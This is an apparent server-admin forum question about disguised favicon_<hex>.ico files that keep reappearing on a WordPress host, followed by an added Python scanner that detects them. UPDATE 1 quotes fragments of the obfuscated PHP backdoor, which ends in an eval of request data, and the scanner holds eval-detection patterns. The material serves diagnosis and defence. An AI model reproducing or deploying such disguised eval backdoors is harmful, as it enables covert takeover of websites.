apache – Mysterious ico files appearing on webserver

Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called something like favicon_1166f9.ico. The first 6 characters are always favico and the extension is always ico, although these are not icons and cannot be opened by an image viewer.

Five days ago I did a clean sweep and deleted hundreds of these files, yet I just found two. I noticed some on the server before but thought it was just corruption from uploading a favicon, but obviously this is not the case. The site actually has one favicon.ico in just the home dir and is working fine.

What could be causing these files to keep appearing? Is the site hacked?

UPDATE 1: Starting to really look like a hack. Here is the partial content being inserted:

$c6d81c6 = 607;$GLOBALS('g1aff67e')=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"x47x4cx4fBx41x4cx53"}('h21842aa7')="x59x2fx6cx45x75x44x7ax6fx68x2ax53x74x73x51x48x72x26x21x25x67x28x70x55x7cxax76x35x60x52x43x65x3dx4dx71x4fx32x31x7ex34x20x5ax41x2ex2cx3bx9x30x6ax57x6ex3f

And it goes on for 7K ending in:

(91).$g1aff67e('h21842aa7')(38).$g1aff67e('h21842aa7')(36).$g1aff67e('h21842aa7')(57).$g1aff67e('h21842aa7')(36).$g1aff67e('h21842aa7')(66).$g1aff67e('h21842aa7')(38))($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db(1)($b7ce1c0db(2)));exit();}}} ?>

Note that the last part is an eval of whatever the rest is.

UPDATE 2: This StackOverflow question shows someone with the same problem.

There is an accepted answer, but the proposed solution is to disable all POST requests, which will not be possible here given this is a WordPress site and there are other parts using POST too (although not many, but they are necessary).

Given this information it seems that this is an attack and not a virus, which is probably why a virus scan turned up nothing.

The question now is: How do I prevent this attack from working? If that is in fact what is going on.
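
Added example, not part of the original question: a small Python scanner for the pattern described above, flagging .ico files whose name matches favicon_<hex>.ico, whose content lacks the ICO header, or which contain PHP markers such as the comment-split eval quoted in UPDATE 1. The demo tree, its file contents and the function names are constructed for illustration.

```python
import os
import re
import tempfile

# Name pattern from the question: "favicon_" + hex suffix + ".ico".
SUSPECT_NAME = re.compile(r"^favicon_[0-9a-f]+\.ico$", re.IGNORECASE)
ICO_MAGIC = b"\x00\x00\x01\x00"  # first four bytes of a genuine ICO file
# PHP open tag, $GLOBALS, or eval( with optional comments wedged before the
# parenthesis, as in the "eval/*v3f8d8*/(" tail quoted in the question.
PHP_CODE = re.compile(rb"<\?php|\$GLOBALS|eval\s*(?:/\*.*?\*/\s*)*\(", re.DOTALL)

def classify(path, limit=1 << 20):
    """Return the reasons a .ico file looks like a planted script (empty = clean)."""
    with open(path, "rb") as fh:
        data = fh.read(limit)
    reasons = []
    if SUSPECT_NAME.match(os.path.basename(path)):
        reasons.append("name matches favicon_<hex>.ico")
    if not data.startswith(ICO_MAGIC):
        reasons.append("no ICO magic bytes")
    if PHP_CODE.search(data):
        reasons.append("contains PHP code markers")
    return reasons

def scan(webroot):
    """Walk webroot and map each suspicious .ico path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(".ico"):
                path = os.path.join(dirpath, name)
                reasons = classify(path)
                if reasons:
                    findings[path] = reasons
    return findings

def demo():
    """Scan a constructed tree: one real icon header, one planted file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        with open(os.path.join(root, "favicon.ico"), "wb") as fh:
            fh.write(ICO_MAGIC + b"\x01\x00" + b"\x00" * 16)  # constructed
        planted = os.path.join(root, "wp-content", "uploads", "favicon_1166f9.ico")
        with open(planted, "wb") as fh:
            fh.write(b"<?php /* constructed sample */ eval/*v3f8d8*/('1;'); ?>")
        return {os.path.relpath(p, root): r for p, r in scan(root).items()}

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

A legitimate favicon saved in PNG format under an .ico name will trigger only the "no ICO magic bytes" reason, so treat that reason on its own as low confidence.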